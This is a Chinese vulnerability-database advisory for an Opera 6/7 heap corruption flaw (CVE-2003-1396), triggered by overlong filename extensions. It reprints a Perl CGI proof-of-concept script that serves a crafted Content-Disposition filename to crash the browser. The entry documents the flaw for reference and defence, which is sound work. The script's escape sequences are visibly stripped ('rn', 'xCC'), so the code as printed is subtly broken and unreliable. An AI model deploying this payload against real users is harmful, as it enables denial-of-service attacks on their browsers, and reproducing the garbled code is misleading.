Opera 6/7文件扩展名远程堆破坏漏洞

Opera 6/7文件扩展名远程堆破坏漏洞

漏洞ID 1107293 漏洞类型 缓冲区溢出
发布时间 2003-04-28 更新时间 2003-12-31
图片[1]-Opera 6/7文件扩展名远程堆破坏漏洞-安全小百科CVE编号 CVE-2003-1396
图片[2]-Opera 6/7文件扩展名远程堆破坏漏洞-安全小百科CNNVD-ID CNNVD-200312-195
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/22550
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-195
|漏洞详情
Opera是一款多平台的WEB浏览器。Opera没有正确检查文件扩展名长度,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可触发堆破坏,造成拒绝服务。Opera以宽字符编码方式把文件名写入到堆缓冲区中,在写入过程中,Opera没有检查扩展名长度,就写入数据到缓冲区边界上,可导致指针覆盖,和管理堆的结构破坏(被类似”XX00XX00″任意数据写入),使Opera崩溃终止。根据作者分析此漏洞不能用于执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/7450/info

A vulnerability has been reported for Opera versions 7.10 and earlier. The problem is said to occur due to insufficient bounds checking on filename extensions. As a result, it may be possible for an attacker to corrupt heap-based memory.

Successful exploitation of this vulnerability may result in a denial of service, possibly prolonged. If a malicious filename entry were placed in a cache file, Opera may continuously crash until the cache file has been deleted.

#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.

$|=1;
my $filename = "." . "xCC" x (int(rand(0x20000)) + 0x100);

print "Content-type: text/htmlrn";
print qq~Content-Disposition: filename="$filename"rn~;
print "rn";
print "<html><body>Love & Peace :)</body></html>rn";
|参考资料

来源:BID
名称:7450
链接:http://www.securityfocus.com/bid/7450
来源:XF
名称:opera-file-extension-bo(11894)
链接:http://xforce.iss.net/xforce/xfdb/11894
来源:BUGTRAQ
名称:20030427[Opera7/6]LongFileExtensionHeapBufferOverrunVulnerabilityinDownload.
链接:http://archives.neohapsis.com/archives/bugtraq/2003-04/0346.html
来源:NSFOCUS
名称:4771
链接:http://www.nsfocus.net/vulndb/4771

相关推荐: NetcPlus SmartServer3 SMTP Buffer Overflow

NetcPlus SmartServer3 SMTP Buffer Overflow 漏洞ID 1104579 漏洞类型 Boundary Condition Error 发布时间 1999-09-13 更新时间 1999-09-13 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享